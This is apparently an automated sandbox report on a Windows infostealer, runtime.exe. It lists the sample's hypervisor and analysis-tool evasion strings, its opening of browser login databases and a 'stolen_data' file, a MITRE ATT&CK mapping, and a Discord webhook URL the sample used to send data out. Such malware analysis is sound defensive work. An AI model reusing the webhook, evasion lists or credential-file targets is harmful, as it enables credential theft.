Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionaA
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237651519.00000250E983C000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB30D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
Source: runtime.exe, 00000000.00000003.2170967884.00000250E9918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionl1E
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServiceDLr;
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partition.dlljN
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor.mui+Jd;
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus PipeslND;
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: runtime.exe, 00000000.00000003.2195626457.00000250EB311000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2203375590.00000250EB6FF000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2207099867.00000250EB6B0000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2193659488.00000250EB32E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: runtime.exe, 00000000.00000003.2170949145.00000250EB183000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2170385804.00000250EB18C000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2167618695.00000250EB181000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2167847201.00000250EB18C000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2173955232.00000250EB183000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupt
Source: runtime.exe, 00000000.00000002.2237651519.00000250E983C000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB30D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor#
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition1Az;
Source: runtime.exe, 00000000.00000002.2237651519.00000250E983C000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB30D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root PartitionSO
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor~FN;
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: runtime.exe, 00000000.00000003.2184370503.00000250EB1E1000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2183690960.00000250EB1E1000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2184096020.00000250EB1E1000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2183623307.00000250EB1E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V vkfsdoejldlmphk Bus Pipes
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus PipesmO
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServiceMG;
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root PartitioncEI
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorui
Source: runtime.exe, 00000000.00000002.2237651519.00000250E983C000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB30D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.sys
Source: runtime.exe, 00000000.00000003.2237137204.00000250EB642000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2237215795.00000250EB650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: runtime.exe, 00000000.00000003.2168249547.00000250EB1DC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2168803108.00000250EB1DC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2168426478.00000250EB1DC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2170266680.00000250EB1DC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2170097359.00000250EB1DC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2169994828.00000250EB1DC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2168361416.00000250EB1DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Re
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorr
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
Source: runtime.exe, 00000000.00000003.2172378935.00000250E9921000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: umber4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: runtime.exeBinary or memory string: procexp64.exeprocexp.exeProcmon.exeProcmon64.exepestudio.exeKsDumper.exeprl_cc.exeprl_tools.exepe-sieve64.exehollows_hunter32.exeMoneta64.exefakenet.exeWireshark.exeVBoxService.exeVMwareUser.exevmtoolsd.exeVMwareTray.exevmsrvc.exeVGAuthService.exeVBoxTray.exeC:\Users\DohanyZoe\.cargo\registry\src\index.crates.io-6f17d22bba15001f\antilysis-0.1.2\src\lib.rs
Source: runtime.exe, 00000000.00000002.2237651519.00000250E983C000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB30D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processorl
Source: runtime.exe, 00000000.00000003.2212094875.00000250E98AC000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2200613737.00000250E989D000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2197752137.00000250EB37E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000002.2237736020.00000250E98A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V vkfsdoejldlmphk Bus
Source: C:\Users\user\Desktop\runtime.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\runtime.exeMemory allocated: page read and write | page guardJump to behavior
Source: runtime.exe, 00000000.00000003.2194441393.00000250EB395000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2194441393.00000250EB308000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: runtime.exe, 00000000.00000003.2194441393.00000250EB308000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd&
Source: C:\Users\user\Desktop\runtime.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\runtime.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\runtime.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\runtime.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\runtime.exeQueries volume information: C:\Users\user\Desktop\stolen_data_20241025_083429.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\runtime.exeCode function: 0_2_00007FF7AA5C1924 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7AA5C1924

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\runtime.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.jsonJump to behavior
Source: C:\Users\user\Desktop\runtime.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_copyJump to behavior
Source: C:\Users\user\Desktop\runtime.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
Source: C:\Users\user\Desktop\runtime.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\runtime.exeFile opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\runtime.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\runtime.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data_copyJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
2
Process Injection
1
Masquerading
1
OS Credential Dumping
1
System Time Discovery
Remote Services1
Data from Local System
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
System Information Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
runtime.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truefalse
    unknown
    241.42.69.40.in-addr.arpa
    unknown
    unknownfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://discord.com/api/webhooks/1299085791254937640/Kk0DcgSpuWBwS9yryFX1nlEjkFwrVh2is32Q3WMk6aukk3Rruntime.exe, 00000000.00000002.2238055806.00000250EB1E3000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2236714574.00000250EB618000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://crl4.digicruntime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://crl4.digiccom/runtime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://docs.rs/getrandom#nodejs-es-module-supportruntime.exefalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              162.159.138.232
              discord.comUnited States
              13335CLOUDFLARENETUSfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1541872
              Start date and time:2024-10-25 09:10:10 +02:00
